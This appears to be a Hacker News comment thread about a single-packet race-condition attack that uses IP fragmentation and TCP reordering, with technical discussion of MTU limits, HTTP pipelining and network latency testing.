Single-packet race condition breaking the 65535 byte lim

com · 2024-08-05T10:02:44 1722852164

Please don’t correct the title, it’s delightful as it is.

phito · 2024-08-05T10:30:57 1722853857

I don't see anything wro

floydian10 · 2024-08-05T10:45:20 1722854720

What is wrong wit

genter · 2024-08-05T10:06:54 1722852414

Don't think it would fit.

EADDRINUSE · 2024-08-05T10:55:24 1722855324

I don't see any packetlo

simiones · 2024-08-05T11:34:18 1722857658

It should be noted that IP fragmentation is quite limited and often buggy. IPv6 only requires receivers to re-assemble an IP packet that is at most 1500 bytes, so sending a 65KB TCP segment is quite likely to just result in dropped packets.

Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link. Jumbo frames (~9000 bytes) and even beyond are possible if all the devices are configured in the right way. Additionally, IPv6 actually supports packets up to ~4GiB in size (so called "jumbograms", with an additional header), though I think it would be truly hard to find any network which uses this feature.

zamadatix · 2024-08-05T15:34:27 1722872067

> Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link.

The two concepts are completely independent and orthogonal. You can have a 1280 byte link MTU on a device which happily reassembles 9x fragments into a 9000 byte payload. You can also have another device with a 9000 byte link MTU which refuses to reassemble 2x 1280 byte fragments into a single 2000 byte packet simply because it doesn't have to. Both devices are IPv6 compliant.

Well, I suppose there is 1 causal relationship between link layer MTU and IPv6 fragmentation: "how much bigger than 1280 bytes can the individual fragments be".

simiones · 2024-08-06T10:55:04 1722941704

Oh, yes, what I meant to say is that you can send frames larger than 1500 bytes without resorting to IP fragmentation, in certain networks. I can see how it sounded like the "1500 limit" was the IPv6 reassembly limit, but I wanted to refer to the 1500 limit for a single frame.

gnfargbl · 2024-08-05T12:49:23 1722862163

Indeed. If the attack works by exploiting (reliable) TCP re-ordering algorithms in the server then why also bother with (unreliable) IP fragmentation? Just send a larger number of out-of-order TCP packets, surely?

jandrese · 2024-08-05T18:43:03 1722883383

The article says the attack was more successful when using IP fragmentation in conjunction with TCP reordering. Probably it is two separate memory areas that have independent limits allowing you to store more data in the stack.

gnfargbl · 2024-08-05T19:09:10 1722884950

Then the author needs to take a properly scientific approach and measure why that is, rather than waving their hands about.

nine_k · 2024-08-05T18:22:03 1722882123

Technically 65535 bytes is exactly 64 KiB minus one byte. Likely some uint16 variables must be overflowing somewhere.

wrs · 2024-08-05T20:40:34 1722890434

BTW, you don’t have to rent servers on opposite sides of the planet just to increase network latency for testing.

    tc qdisc add dev eth0 root netem delay 200ms

AstralStorm · 2024-08-05T10:54:52 1722855292

So, is this a DoS technique or what? Or trying to avoid TCP side transmission rate limits, which anyway should be implemented IP side?

edelbitter · 2024-08-05T12:10:09 1722859809

Two techniques, even: More requests processed at once, after a very (bandwidth-adjusted) precisely user-controlled starting point. One helps with race conditions in the server, the other helps racing 3rd party requests. Sending a highly-efficient "go" packet for many HTTP requests is sure ruining the fun for all the others awaiting some pre-announced concert ticket / GPU sale to open.

If the website accounting is merely "eventually consistent" between threads/servers and you are able to fire many (large) requests at a precise (determined by small packet) point in time, both techniques work in tandem - could have (one of) your post(s) appear with repeating digits (such as at https://news.ycombinator.com/item?id=42000000) without just seeing "Sorry, we're not able to serve your requests this quickly."

jandrese · 2024-08-05T15:21:12 1722871272

I think it's ultimately about bypassing a TOTP 2FA by exploiting a race condition in the authentication failure backoff timer to submit thousands of possible codes simultaneously. The technique is about abusing the TCP stack and IP fragmentation to load up the stack on the server with as much data as possible before hitting it with a "go" packet that completes the fragments on the head of line blocking data buffer and spills all of the contents into the webserver before a single RTT can be completed.

twoodfin · 2024-08-05T11:38:11 1722857891

Many real-world web applications “shockingly” don’t guarantee ACID-style transactional state updates, and thus are vulnerable to race conditions.

Suppose (for instance) that the application tier caches user session information by some internal, reused ID.

If that state is updated transactionally, with an ID assigned to a new session atomically with the insertion of that new session’s data, no problem.

But if the session is assigned a previously used ID a few microseconds before the new session’s data is populated, a racing request could see the old data from a different user.

AnssiH · 2024-08-05T11:23:36 1722857016

AFAICS this is about exploiting race condition bugs that require a large number of requests to be processed almost-simultaneously.

weissnick · 2024-08-05T15:26:09 1722871569

This technique is briefly discussed in chapter 5.3.1 in the master thesis "Exploiting Race Conditions in Web Applications with HTTP/2" - https://ntnuopen.ntnu.no/ntnu-xmlui/handle/11250/2781157

The same paper is also referenced to by James Kettle in his research.

algesten · 2024-08-05T14:12:17 1722867137

I assume with HTTP/1.1 this would be less useful, since each synchronized request would require another socket, thus hitting potential firewalls limiting SYN/SYN-ACK rate and/or concurrent connections from the same IP.

In some respects this is abusing the exact reason we got HTTP/3 to replace HTTP/2 – it's a deliberate Head-of-Line (HoL) blocking.

toast0 · 2024-08-05T15:30:40 1722871840

You can pipeline requests on http/1.1. But most servers handle one request at a time, and don't read the next request until the current request's response is finished. (And mainstream browsers don't typically issue pipelined requests on http/1.1, IIRC)

If you have a connection per request, and you need 1000 requests to be 'simultaneous', you've got to get a 1000 packet burst to arrive closely packed, and that's a lot harder than this method (or a similar method suggested in comments of sending unfragmented tcp packets out of order so when the first packet of the sequence is recieved, the rest of the packets are already there)

algesten · 2024-08-05T18:12:56 1722881576

Ok, pipelining as in using the fact that the socket is bidirectional, so you queue up the next request before the previous response has arrived?

Sounds a bit dodgy, since any response could potentially contain a Connection: Close. Maybe ok for some scenarios with idempotent methods.

toast0 · 2024-08-05T19:07:29 1722884849

It's less that the socket is bidrectional, but that most requests have an unambiguous end. A pipeline-naive server with Connection: keep-alive is going to read the current request until the end, send a response, and then read from there. You don't have to wait for the response to send the next request; and you'll get better throughput if you don't.

Some servers do some really wacky stuff if you pipeline requests though. The RFC is clear, the server should respond to each request one at a time, in order. However, some servers choose not to --- I've seen out of order responses, interleaved responses, as well as server errors in response to pipelined requests. That's one of the reasons browsers don't tend to do it.

You also rightfully bring up the question of what to do if the connection is closed and your request has no response. IMHO, if you got Connection: Close in a response, that's an unambigious case --- the server told you when serving response N that it won't send any more responses, and I think it's safe to resend any N+1 requests, as the server knows you won't get the response and so it shouldn't process those requests. It's less clear when the connection is closed without explicit signalling --- the server may be processing the requests and you don't know. http/2 provides for an explicit close that tells you what the last request it saw, which addresses this, on http/1.1 when the server closes unexpectedly it's not clear. That often happens when the connection is idle.

An HTTP/1.1 server may send hints about how many requests until it closes the connection (which would be explicit), as well as the idle timeout (in seconds). But it's still not fun when you send a request and you receive a TCP close, and you have to guess if the server closed before it got the request (you should resend) or after (your request crashed the server, and you probably shouldn't resend).

capitainenemo · 2024-08-05T19:08:17 1722884897

https://en.wikipedia.org/wiki/HTTP_pipelining https://www-archive.mozilla.org/projects/netlib/http/pipelin... https://kb.mozillazine.org/Network.http.pipelining This has existed for years, and honestly it worked pretty well for me on most servers before HTTP2 came around, so long as you didn't abuse it. You could setup multiple connections too. I usually had mine set to "4"

Some servers didn't support it, most did though. Which was why when the first HTTP2 tech demos came out, I really couldn't see the enormous speedups people were trying to demo.

Out_of_Characte · 2024-08-05T13:53:10 1722865990

This title is about as apt as my username

layer8 · 2024-08-05T15:23:18 1722871398

The title seems to be in-character though.

tontonius · 2024-08-05T11:56:36 1722858996

"Its not clear why TCP settled on such an oddly specific number"

FuriouslyAdrift · 2024-08-05T15:17:48 1722871068

Better than I could ever explain... https://networkengineering.stackexchange.com/questions/2962/...

simiones · 2024-08-05T13:23:54 1722864234

I couldn't find any quote that is even remotely similar to this in the article. Can you give more context?

Avamander · 2024-08-05T13:27:45 1722864465

It's probably a reference to the news article about Whatsapp increasing maximum group size to 256 and a journalist pondering over why such a specific number was chosen. OP probably meant it a similar sense, why was 65535 chosen (but it's not really such a mystery).

Alifatisk · 2024-08-05T12:51:58 1722862318

I don’t know why the author said that, Is it really unclear to why?